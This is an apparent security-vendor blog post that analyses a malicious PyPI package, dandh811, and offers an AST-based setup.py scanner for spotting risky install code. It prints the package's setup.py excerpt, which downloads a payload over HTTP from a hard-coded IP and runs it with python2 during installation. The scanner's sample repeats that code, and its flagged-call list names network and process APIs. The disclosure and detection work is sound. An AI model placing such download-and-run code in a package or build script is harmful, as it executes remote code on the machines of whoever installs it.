Another malicious Python package discovered

Reported Jan 04, 2022 by Ashish Bijlani

Package: dandh811
Flagged as: downloads payload over http during installation (malicious)
Summary: test
Published: 28 Feb, 2021
PyPI versions: 10
Author: dandh811 <dandh811@163.com>
Dependencies: 1

Our static analysis module flagged package dandh811==0.0.10 as suspicious, so we took a closer look at the code, in particular the statements our technology marked as "risky". On review, the package turned out to be malicious. Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our automatically generated report shows that the package:
- has a homepage that redirects to injection.vip,
- uses network, file, and subprocess APIs in setup.py.


Because setup.py contains code that runs as soon as the package is installed (pip executes it to build the package, before any of the package's own modules are ever imported), it is clear that the package is trying to download and run a malicious payload from a remote server.

    import subprocess
    import urllib2  # Python 2 only; the payload is run with python2 below
    # Fetch the second stage over plain HTTP from a hard-coded IP address
    handler = urllib2.urlopen("http://81.70.89.72/sectest/package/pypi/download")
    with open("/tmp/dandh811.py", "wb") as fp:
        fp.write(handler.read())
    # Run the dropped file; subprocess.call blocks until it exits
    subprocess.call(["python2", "/tmp/dandh811.py"])

Fig 1. setup.py downloads and executes a payload during installation

Fig 1 above shows an excerpt from the setup.py file. It first downloads a payload from the path sectest/package/pypi/download over an unencrypted HTTP channel, with no integrity check on what comes back, so anyone on the network path could substitute their own code. The payload is saved as /tmp/dandh811.py and executed with python2 during installation. Note that subprocess.call waits for the child process to exit, so the install does not finish until the payload has run. Because the second stage is fetched only at install time, it never appears in the package archive itself; that is why setup.py has to be inspected before installation rather than the installed files afterwards.
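The report above lists "network, file, and subprocess APIs in setup.py" as the reason the package was flagged. The following is an added example, not Ossillate's analysis engine and not code from the package, of how such a check can be done statically with Python's ast module: it walks a setup.py, records calls to network, file-write and process-spawning APIs, and flags plain-http URL literals. The sample setup.py embedded below is constructed from the excerpt in Fig 1 (with a setup() call added so it parses as a real build script); the list of risky call names is an assumption chosen for illustration.

```python
import ast

# Constructed sample modelled on the Fig 1 excerpt; not the package's real
# setup.py, which is not reproduced in full on this page.
SAMPLE_SETUP_PY = '''
import urllib2
import subprocess
from setuptools import setup

handler = urllib2.urlopen("http://81.70.89.72/sectest/package/pypi/download")
with open("/tmp/dandh811.py", "wb") as fp:
    fp.write(handler.read())
subprocess.call(["python2", "/tmp/dandh811.py"])

setup(name="dandh811", version="0.0.10")
'''

# Dotted call names that give a build script network, process or code-exec
# capability. This list is an assumption for the example; a build script
# rarely needs any of these at import time.
RISKY_CALLS = {
    "urllib2.urlopen": "network",
    "urllib.request.urlopen": "network",
    "requests.get": "network",
    "requests.post": "network",
    "socket.socket": "network",
    "subprocess.call": "process",
    "subprocess.Popen": "process",
    "subprocess.run": "process",
    "subprocess.check_output": "process",
    "os.system": "process",
    "os.popen": "process",
    "exec": "process",
    "eval": "process",
}
WRITE_MODES = {"w", "wb", "a", "ab", "w+", "wb+"}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return sorted (lineno, category, detail) findings for a setup.py source."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, RISKY_CALLS[name], name))
            # open(path, "w"/"wb"/...) drops a file on disk during the install
            if name == "open" and len(node.args) >= 2:
                mode = node.args[1]
                if isinstance(mode, ast.Constant) and mode.value in WRITE_MODES:
                    findings.append((node.lineno, "file", "open(mode=%r)" % mode.value))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # A plain-http URL can be tampered with by anyone on the path
            if node.value.startswith("http://"):
                findings.append((node.lineno, "insecure-http", node.value))
    return sorted(findings)


def categories(findings):
    """Distinct finding categories, e.g. ['file', 'insecure-http', 'network', 'process']."""
    return sorted({cat for _, cat, _ in findings})


if __name__ == "__main__":
    for lineno, cat, detail in scan_setup_py(SAMPLE_SETUP_PY):
        print("line %d [%s] %s" % (lineno, cat, detail))
```

Run against a downloaded sdist by reading its setup.py into scan_setup_py; anything in the network or process categories is worth a manual look before you let pip execute it. A pattern-based scan like this is only a first filter: obfuscated scripts (string concatenation, getattr, base64-encoded source passed to exec) can hide the call names, which is why the exec and eval entries above matter and why a finding should lead to reading the script, not just to a score.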

We tried downloading the payload manually from 81.70.89.72, but the server was not reachable. ipinfo.io shows that this server is located in China.

We reported our findings to the PyPI maintainers, and they have yanked this package as of January 2022.